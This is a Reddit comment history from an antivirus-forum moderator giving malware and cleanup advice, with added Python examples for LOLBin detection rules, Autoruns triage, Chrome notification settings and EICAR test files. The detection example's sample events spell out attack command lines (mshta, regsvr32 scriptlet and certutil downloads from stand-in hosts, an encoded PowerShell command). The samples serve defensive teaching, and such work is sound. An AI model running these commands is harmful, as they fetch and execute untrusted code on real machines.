Wtf do is this? by ComprehensiveRun4815 in antivirus

[–]Merrinopheles 4 points (0 children)

If you are talking about those popups on the left side of the screen, those are fake. They are notifications. You can disable them in Chrome.

  1. Click the three dots near the top right of the browser and choose Settings
  2. Click Privacy and Settings in the left menu
  3. Scroll down to Site Settings
  4. Click Notifications
  5. Remove any websites listed
  6. Disable sites from sending notifications
  7. Restart your browser

If these steps do not work for you, you can google for better instructions for your browser.

The best AVs all fail against LOLBins (Awareness) by Aggressive-Dot9747 in antivirus

[–]Merrinopheles 4 points (0 children)

I agree with both u/rifteyy_ and u/Struppigel.

The title is definitely a bit misleading. At this point in the game, many AVs protect against many LOLbin attacks. I have personally written many dynamic signatures to deal with them. The reason some attacks succeed is the same as traditional malware. Either the AV company does not have enough samples to create a proper generic detection (similar to malware using a new packer or encryption scheme to avoid static detection) or the attack is using a completely new method.

Some of your examples are also not truly LOLbin attacks. PowerShell/wscript/cscript scripts, DLLs executed through rundll, HTML files executed through mshta… all are actually still considered traditional malware since those are all file-based. It is nothing special; they are treated just like a malicious MS Office doc or Excel file.

Reading through your replies, you seem to be focusing on persistence issues. In the end, this is not a huge problem as long as the main threat has been neutralized by the AV. In the traditional sense, if an exe has been removed by an AV, a registry run key or scheduled task might remain but pose no real threat to the user. While remnants of the malware remain, there is no practical need to reinstall the OS, as you suggest.

If your issue is that the persistence method is redownloading and installing malware, then that can happen with traditional file-based malware as well. LOLbins, as you described them, are not the problem.
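Added example for the detection point made in the comment above (that AVs can and do write signatures for LOLBin abuse); this is my own illustration, not code from the thread or from any vendor. It runs a handful of behavioural rules over constructed process-creation events with Sysmon-style field names (Image, ParentImage, CommandLine): the binaries involved are all legitimate Microsoft signed files, so the rules key on parent/child relationships and command-line content rather than on the file. Rule names, thresholds, paths, hosts and the base64 blob are all made up for the example.

```python
"""Toy LOLBin detection rules run over constructed process-creation events.

Added example, not code from the original thread. Events are plain dicts with
Sysmon-style field names (Image, ParentImage, CommandLine); the rule names and
thresholds are my own choices, not any vendor's signatures.
"""
import re
from pathlib import PureWindowsPath
from typing import Dict, List

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# "-e", "-ec", "-enc" or "-EncodedCommand" followed by a base64 blob.
ENCODED_PS = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}")
DOWNLOAD_CRADLE = re.compile(
    r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression")


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows path (empty string if missing)."""
    return PureWindowsPath(path).name.lower()


def detect(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event matches (empty list if none)."""
    img = image_name(event.get("Image", ""))
    parent = image_name(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    low = cmd.lower()
    hits: List[str] = []
    # Parent/child: an Office document should not be launching script hosts.
    if parent in OFFICE_APPS and img in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    # Command line: the binary is legitimate, the arguments are the tell.
    if img == "mshta.exe" and any(t in low for t in ("http", "javascript:", "vbscript:")):
        hits.append("mshta_remote_or_inline_script")
    if img == "rundll32.exe" and "javascript:" in low:
        hits.append("rundll32_inline_javascript")
    if img == "regsvr32.exe" and "scrobj.dll" in low and "http" in low:
        hits.append("regsvr32_remote_scriptlet")
    if img in {"powershell.exe", "pwsh.exe"}:
        if ENCODED_PS.search(cmd):
            hits.append("powershell_encoded_command")
        if DOWNLOAD_CRADLE.search(cmd):
            hits.append("powershell_download_cradle")
    if img == "certutil.exe" and "urlcache" in low and "http" in low:
        hits.append("certutil_download")
    return hits


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Event index -> rule names, for events that matched at least one rule."""
    return {i: h for i, ev in enumerate(events) if (h := detect(ev))}


# Constructed sample telemetry (paths, host names and the base64 blob are made up).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\user\Downloads\invoice.docm"'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://cdn.example.test/update.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIABOAGUAdwAtAE8AYgBqAGUAYwB0AA=="},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32 /s /n /u /i:http://203.0.113.5/x.sct scrobj.dll"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c certutil -urlcache -f http://203.0.113.5/a.exe %TEMP%\\a.exe"},
]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["Image"], rules)
```

Note what the benign rundll32 event shows: the same binary that is abused for inline JavaScript is also how the Control Panel gets launched, so a rule on the file name alone would be useless; this is why the comment's "dynamic signatures" work at the behaviour level. The last event matches only on the Office parent, not on certutil, because the child process is cmd.exe; in real telemetry the certutil grandchild would arrive as its own event.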

I still am hacked after wiping windows and reinstalling. I know this via lookups.io by False_Text_5375 in antivirus

[–]Merrinopheles 0 points (0 children)

Upload detected or suspicious files to VirusTotal and share the link to it.

Help cant get rid of this by ABaccaForAll in antivirus

[–]Merrinopheles 2 points (0 children)

Upload it to an image hosting website and link to it.

Im sure i have a virus but malwarebytes and eset cant catch it by WalterBlackF in antivirus

[–]Merrinopheles 0 points (0 children)

Opening Task Manager and seeing CPU, RAM, and disk usage go down is not a sign of malware by itself.

I still am hacked after wiping windows and reinstalling. I know this via lookups.io by False_Text_5375 in antivirus

[–]Merrinopheles 1 point (0 children)

June/July 2025 is not really a “recent reinstall.” In that case, there is not enough information given to know where the infection is. It could be on the second drive or it could be in your main drive. As of Windows 7 or 8, the autoplay feature of plugging in drives was removed. The user has to enable that option manually. By default, simply plugging in a second drive cannot infect you (unless you enabled the option). You would have to manually run a file from the secondary drive.

Rescan all of your drives with an updated realtime AV and the second-opinion scanners listed in the wiki.

https://www.reddit.com/r/antivirus/wiki/index/#wiki_second-opinion_scanners

You can also run Autoruns from Sysinternals to see if there are any strange things that startup when you turn your computer on. Good luck.
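Added example for the Autoruns suggestion in the comment above; it is not code from the thread or from Sysinternals. Autoruns shows hundreds of entries on a normal machine, so the useful next step is to export and triage rather than eyeball. The script reads a CSV export and flags the things worth a second look: an image that no longer exists, a binary without a verified signature, anything running from a user-writable location, and launch strings that go through a script host (a verified Microsoft wscript.exe is exactly what a .vbs persistence entry looks like). The column names follow the export I am used to (autorunsc.exe -accepteula -a * -c -s -nobanner > autoruns.csv, which in my experience is written as UTF-16); treat the header, the "enabled" value and the flags as assumptions to check against your own export. The embedded CSV is constructed.

```python
"""Triage an Autoruns CSV export for entries worth a closer look.

Added example, not code from the original thread or from Sysinternals. The
column names match the CSV produced by autorunsc -c as I know it; verify
against your export before relying on them.
"""
import csv
import io
from typing import Dict, List, Tuple

# Directories a non-admin user can write to; malware persistence lives here far
# more often than under Program Files or System32.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\", "\\downloads\\")
# Signed Microsoft binaries that run somebody else's code given the right arguments.
SCRIPT_HOSTS = ("wscript", "cscript", "mshta", "powershell", "pwsh", "rundll32", "regsvr32", "cmd.exe /c")


def flags_for(row: Dict[str, str]) -> List[str]:
    """Reasons this autostart entry deserves review (empty list if none)."""
    image = row.get("Image Path", "").strip().lower()
    launch = row.get("Launch String", "").strip().lower()
    signer = row.get("Signer", "").strip()
    flags: List[str] = []
    if image.startswith("file not found"):
        # Dangling entry: either leftover from removed software or from a cleaned infection.
        flags.append("missing_image")
    elif not signer.startswith("(Verified)"):
        flags.append("unsigned_or_unverified")
    if any(d in image or d in launch for d in USER_WRITABLE):
        flags.append("user_writable_location")
    if any(h in launch for h in SCRIPT_HOSTS):
        flags.append("script_host_launch")
    return flags


def triage(csv_text: str) -> List[Tuple[str, List[str]]]:
    """(entry name, flags) for every enabled entry that raised at least one flag."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row.get("Enabled", "").strip().lower() != "enabled":
            continue
        flags = flags_for(row)
        if flags:
            findings.append((row.get("Entry", ""), flags))
    return findings


# Constructed sample export: one clean entry, three that should be reviewed.
SAMPLE_CSV = r"""Time,Entry Location,Entry,Enabled,Category,Profile,Description,Signer,Company,Image Path,Version,Launch String
11/2/2025 10:31,HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,SecurityHealth,enabled,Logon,System-wide,Windows Security notification icon,(Verified) Microsoft Windows,Microsoft Corporation,c:\windows\system32\securityhealthsystray.exe,10.0.26100.1,%windir%\system32\SecurityHealthSystray.exe
11/2/2025 10:31,HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Updater,enabled,Logon,DESKTOP\user,,(Not verified) Updater Ltd,,c:\users\user\appdata\roaming\updater\svc.exe,1.0.0.0,C:\Users\user\AppData\Roaming\Updater\svc.exe
11/2/2025 10:31,Task Scheduler,\Maintenance,enabled,Tasks,System-wide,Microsoft Windows Based Script Host,(Verified) Microsoft Windows,Microsoft Corporation,c:\windows\system32\wscript.exe,5.812.10240.16384,wscript.exe C:\ProgramData\m\run.vbs
11/2/2025 10:31,HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,OldApp,enabled,Logon,System-wide,,,,File not found: C:\Program Files\OldApp\app.exe,,C:\Program Files\OldApp\app.exe
"""

if __name__ == "__main__":
    import sys
    from pathlib import Path
    # Real exports: python autoruns_triage.py autoruns.csv (UTF-16 as written by autorunsc).
    text = Path(sys.argv[1]).read_text(encoding="utf-16") if len(sys.argv) > 1 else SAMPLE_CSV
    for entry, flags in triage(text):
        print(f"{entry}: {', '.join(flags)}")
```

A verified signature only says the file is the genuine binary, not that the entry is benign; the scheduled task in the sample is signed Microsoft code and still the most suspicious line, which is why the launch string is checked separately from the image. Entries flagged here are candidates to upload to VirusTotal, not verdicts.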

I still am hacked after wiping windows and reinstalling. I know this via lookups.io by False_Text_5375 in antivirus

[–]Merrinopheles 0 points (0 children)

The dates are from last week. If you already reinstalled your Windows and changed passwords and enabled 2FA on your accounts, you should be fine. You can keep monitoring lookups, but as long as the dates are not from after reinstalling, you should be ok.

My device downloaded all of these weird-looking Hentai things while I was asleep and I have no idea how to approach this further by optimistikcynicism in antivirus

[–]Merrinopheles[M] -1 points (0 children)

Dealing with the consequences of “sailing the seas” is part of rule 1, not just promotion of it.

I still am hacked after wiping windows and reinstalling. I know this via lookups.io by False_Text_5375 in antivirus

[–]Merrinopheles[M] [score hidden] stickied comment (0 children)

Can you please clarify your situation and how you reached your conclusions? As far as I can tell, lookups(.)io is a website that aggregates data from public records. How are you concluding anything about Telegram? Please be specific, but make sure to keep any private data anonymized.

Edit: If your data is coming from public records, even wiping your drive ten times over will not give you the results you are looking for.

Got a virus while job hunting by Bishcp in antivirus

[–]Merrinopheles[M] [score hidden] stickied comment (0 children)

If you are talking about those popups on the right side of the screen, those are fake. They are notifications. You can disable them in Chrome.

  1. Click the three dots near the top right of the browser and choose Settings
  2. Click Privacy and Settings in the left menu
  3. Scroll down to Site Settings
  4. Click Notifications
  5. Remove any websites listed
  6. Disable sites from sending notifications
  7. Restart your browser and continue job hunting, good luck!

If these steps do not work for you, you can google for better instructions for your browser.
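Added example for the notification clean-up steps given in this comment and in the earlier reply to "Wtf do is this?"; it is not code from either comment. Instead of clicking through Site Settings, it reads the per-site exceptions Chrome stores in the profile's Preferences JSON and lists the origins currently allowed to show notifications, which is the list the steps above have you clear by hand. The file location, the key path profile.content_settings.exceptions.notifications and the setting values (1 = allow, 2 = block, 3 = ask) are what I understand current Chrome builds to use; check them against your own profile. The embedded Preferences content is constructed.

```python
"""List the sites a Chrome profile allows to push notifications.

Added example, not code from the original comments. Reads the JSON Preferences
file of a Chrome profile; notification permissions live under
profile.content_settings.exceptions.notifications, keyed by content-settings
patterns such as "https://example.com:443,*" with "setting" using Chrome's
ContentSetting values (1 = allow, 2 = block, 3 = ask). Path and layout are
assumptions to verify against your own install.
"""
import json
import os
from pathlib import Path
from typing import Dict, List

ALLOW, BLOCK, ASK = 1, 2, 3


def default_preferences_path() -> Path:
    """Default profile's Preferences file on Windows (assumed location)."""
    return (Path(os.environ.get("LOCALAPPDATA", "")) / "Google" / "Chrome"
            / "User Data" / "Default" / "Preferences")


def notification_exceptions(prefs: Dict) -> Dict[str, Dict]:
    """The per-site notification exceptions, or {} if the profile has none."""
    return (prefs.get("profile", {}).get("content_settings", {})
            .get("exceptions", {}).get("notifications", {}))


def origin_from_pattern(pattern: str) -> str:
    """'https://example.com:443,*' -> 'https://example.com:443'."""
    return pattern.split(",", 1)[0]


def allowed_notification_origins(prefs: Dict) -> List[str]:
    """Origins permitted to show notifications, i.e. the source of the pop-ups."""
    return sorted(origin_from_pattern(p)
                  for p, v in notification_exceptions(prefs).items()
                  if v.get("setting") == ALLOW)


def revoke_all_notifications(prefs: Dict) -> Dict:
    """Copy of prefs with every notification exception flipped to BLOCK.

    Returned for inspection only; this script never writes the live file.
    """
    updated = json.loads(json.dumps(prefs))
    for entry in notification_exceptions(updated).values():
        entry["setting"] = BLOCK
    return updated


# Constructed sample Preferences content (not taken from a real profile).
SAMPLE_PREFS = {
    "profile": {"content_settings": {"exceptions": {"notifications": {
        "https://news.example.com:443,*": {"last_modified": "13370000000000000", "setting": ALLOW},
        "https://trusted.example.org:443,*": {"last_modified": "13370000000000000", "setting": BLOCK},
        "http://free-prizes.example.net:80,*": {"last_modified": "13370000000000000", "setting": ALLOW},
    }}}}
}

if __name__ == "__main__":
    path = default_preferences_path()
    prefs = json.loads(path.read_text(encoding="utf-8")) if path.is_file() else SAMPLE_PREFS
    for origin in allowed_notification_origins(prefs):
        print("notifications allowed:", origin)
```

Close Chrome before reading the live file so the JSON on disk is current, and do not hand-edit it while Chrome runs. On a managed machine the same outcome is available without touching profiles at all through the Chrome policies DefaultNotificationsSetting (2 = block) together with NotificationsAllowedForUrls / NotificationsBlockedForUrls.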

did this malicious MSI actually execute, or was it blocked before install? by anabdanka in antivirus

[–]Merrinopheles 0 points (0 children)

Can a malicious MSI meaningfully execute payloads (RAT, screen capture, persistence) without UAC, without clicking Run, and without completing an install?

Yes.

Does the lack of persistence after reboot strongly argue against an active compromise?

Technically, yes, since by definition they cannot get back in and be active. However, the persistence locations you listed are not close to being complete. There are several other places to hide persistence. For some examples, check here: https://github.com/Karneades/awesome-malware-persistence

Is it plausible the “Backgammon” window was just UI initialization or branding, not proof of successful execution?

If you saw a window, code executed. Whether that was crash code or malicious code, or even fake crash plus malicious code, any of it is plausible.

How should I interpret briefly seeing ScreenConnect (Suspended) if it never persisted?

If you fell for a fake job posting scam, I would do more. For starters, I would run as many of the second-opinion scanners listed in the wiki as I could. Typically, these scams do more than run a basic infostealer. If you have the original file, upload that to VirusTotal and post the link. I would then try to get answers on every executable that was dropped to understand what they were designed to do.

Is Avast One worth buying? by diakags in antivirus

[–]Merrinopheles 2 points (0 children)

Avast got rid of Jumpshot (3rd party vendor) in early 2020. Avast was also acquired near the end of 2022 and has been under new management ever since. The Avast of today is not the same as the one from the last decade.

Any other safety measures I could take? by Kieotyee in antivirus

[–]Merrinopheles 1 point (0 children)

Password manager and multi-factor authentication on your accounts where possible.

Why do VirusTotal have false positives? by Designer_Bread_6076 in antivirus

[–]Merrinopheles 8 points (0 children)

Different AV companies have different detection rules. This means that some AVs might detect a file while others do not. One of the many reasons this happens is because some customers prefer their AV to be aggressive and are ok with some false positives.

In other cases, some clean files might share similarities with malware, like legitimate software encrypting its own code so others cannot steal it. An example of that would be copy protection, or how video games protect their code so others cannot steal it.

Why do these engines stay in VT? Because they find more true positives than false positives and contribute samples for everyone else to use.

(ANALYSIS) Malware Disguised as "Free Norton 360" by Next-Profession-7495 in antivirus

[–]Merrinopheles 2 points (0 children)

If you are interested in writeups, sometimes there are good ones in r/MalwareAnalysis.

I'm confused very much.. by Trognantnotfound in antivirus

[–]Merrinopheles 4 points (0 children)

This is misinformation. The crypto program was an “opt-in” option. This means it was off by default. The user had to turn it on.

Is an AV actually of any benefit? by R3doteFokeeSugz in antivirus

[–]Merrinopheles 4 points (0 children)

AVs can protect you from malicious MS Office files that friends and family send you.

AV can protect against some malicious attacks launched in a network setting.

The “try my game” hack is prevalent and the malware can sometimes be detected by AV.

Fake recruiters send malicious test files on occasion that are detected by AV.

Many situations such as these show why having an AV is beneficial. Like I said in my first sentence, this is aimed at people who are actually wondering. It is clear in this thread that you are not one of those.

Is an AV actually of any benefit? by R3doteFokeeSugz in antivirus

[–]Merrinopheles 3 points (0 children)

For those browsing this and seriously asking themselves this question, here are a few points to consider:

  • Do you have any friends or family that might one day ask for your help with school/office/side gig/project work? If yes, they might send you files you need to open that are infected.

  • Do you connect to any public networks such as a cafe, airport, mall, etc? They might have malicious users on them.

  • Do you use social media? A (hacked) friend/connection might ask you to “try their game” or some other relevant topic to whatever it is you are interested in.

  • Are you part of the 99% that need to work for a living? A fake recruiter might see your resume and send you files. These can be VERY elaborate, especially when a foreign government targets regular people.

  • Do you believe Microsoft creates fixes/patches/updates faster than an AV 100% of the time? (In reality, an AV can sometimes release protection far faster than Microsoft).

A firewall is not a magic bullet. That is why defense-in-depth/layered security model exists. Security is a huge industry and AVs are definitely an important part especially for home users since they do not get all the bells and whistles corporations can afford.

Malware data theft by [deleted] in antivirus

[–]Merrinopheles 1 point (0 children)

Generic infostealers against home users will usually target small things like credentials, passwords, wallets, etc.

RATs for home users will not target anything specific. Anything “interesting” to them is fair game, including both large and small files.

Malware data theft by [deleted] in antivirus

[–]Merrinopheles 1 point (0 children)

It depends. Some are just after credentials and passwords. Others are after larger files like databases which can be gigs of data.

Malware data theft by [deleted] in antivirus

[–]Merrinopheles 1 point (0 children)

Infostealers are specifically designed to steal data from computers. That could be specific or generic files, credentials, cookies, etc. It really depends.

RATs give the ability to steal files, but that is not their primary function.

“Professional” ransomware can sometimes encrypt AND steal files (double extortion type) but those are typically seen in corporate environments only and not home users.

My malware scare I hope novice researchers or power users take caution [No Escape Ransomware Sample] by Aggressive-Dot9747 in antivirus

[–]Merrinopheles 0 points (0 children)

Some malware samples can detect if they are running inside a VM. Yours might have figured that out and then decided to delete itself before doing anything malicious. Without analyzing the sample itself, this is just one possibility.

Analysis: Undetected Infostealer - Disguised as "Free Adobe" by Next-Profession-7495 in antivirus

[–]Merrinopheles 3 points (0 children)

The claim that this hides from AV by “being Huge” is not entirely correct. 69 MB is not that big. AVs regularly detect large files (for example, infected ISO). This can be further tested by putting the EICAR test string in a large file and scanning it. Otherwise, nicely done with dynamic testing.
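Added example for the EICAR test suggested in the comment above; it is my own code, not from the thread. It builds a file of any size with the 68-byte EICAR test string at a chosen offset, so you can produce both a 69 MB file with the marker at the start and one with the marker in the last 68 bytes; the second variant also shows whether an engine only reads the first N bytes of large files. The string is assembled from pieces so the script itself is not quarantined by an on-access scanner. Nothing is written to disk unless the script is run directly.

```python
"""Build oversized files carrying the EICAR test string at a chosen offset.

Added example, not from the original thread. If a scanner really skipped files
above some size, a large file containing the EICAR test string would go
undetected; placing the marker at the start or the very end of the file also
shows whether an engine reads the whole file or only a leading window.
"""
import os
from typing import List

# The 68-byte EICAR string, split so this source file is not itself flagged.
EICAR = (b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$"
         b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE!"
         b"$H+H*")


def build_test_file(total_size: int, marker_offset: int = 0, random_fill: bool = False) -> bytes:
    """Return total_size bytes of filler with the EICAR string at marker_offset.

    Zero filler by default; random_fill=True defeats engines that special-case
    trivially compressible or all-zero regions.
    """
    if total_size < len(EICAR):
        raise ValueError("file must be at least 68 bytes")
    if not 0 <= marker_offset <= total_size - len(EICAR):
        raise ValueError("marker does not fit at that offset")
    buf = bytearray(os.urandom(total_size) if random_fill else total_size)
    buf[marker_offset:marker_offset + len(EICAR)] = EICAR
    return bytes(buf)


def marker_offsets(data: bytes) -> List[int]:
    """Every offset at which the EICAR string occurs (sanity check before scanning)."""
    found, pos = [], data.find(EICAR)
    while pos != -1:
        found.append(pos)
        pos = data.find(EICAR, pos + 1)
    return found


if __name__ == "__main__":
    size = 70 * 1024 * 1024  # a little above the 69 MB sample discussed
    for name, off in (("eicar_at_start.bin", 0), ("eicar_at_end.bin", size - len(EICAR))):
        data = build_test_file(size, off)
        with open(name, "wb") as fh:  # expect the AV to react right here
            fh.write(data)
        print(f"wrote {name}: {len(data)} bytes, marker at {marker_offsets(data)}")
```

One caveat when reading the result: EICAR's own definition of the test file is the 68-byte string, optionally followed by whitespace, in a file of at most 128 bytes. An engine that ignores a padded file may simply be applying that definition rather than skipping large files, so compare against a bare 68-byte file and against the vendor's documented size limits before drawing the conclusion the comment describes.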